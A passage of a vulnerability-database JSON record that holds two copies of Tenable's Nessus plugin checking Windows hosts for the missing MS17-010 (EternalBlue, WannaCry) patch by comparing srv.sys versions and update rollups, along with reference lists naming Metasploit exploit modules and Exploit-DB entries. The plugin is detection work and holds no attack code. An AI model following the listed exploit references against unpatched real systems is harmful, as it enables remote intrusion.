["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0143", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "fireeye", "idList": ["FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786816", "MYHACK58:62201785331", "MYHACK58:62201786827", "MYHACK58:62201785268", "MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201786371"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2021-08-01T12:07:30", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-08-01T12:07:30", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-01T12:07:30", "differentElements": ["cvelist", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitAvailable", "exploitEase", "exploitableWith", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "76ed972eb5e867df7afdd9639e03f684", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:59:36", "history": [], "viewCount": 2956, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-11T13:59:36", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-08-11T13:59:36", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 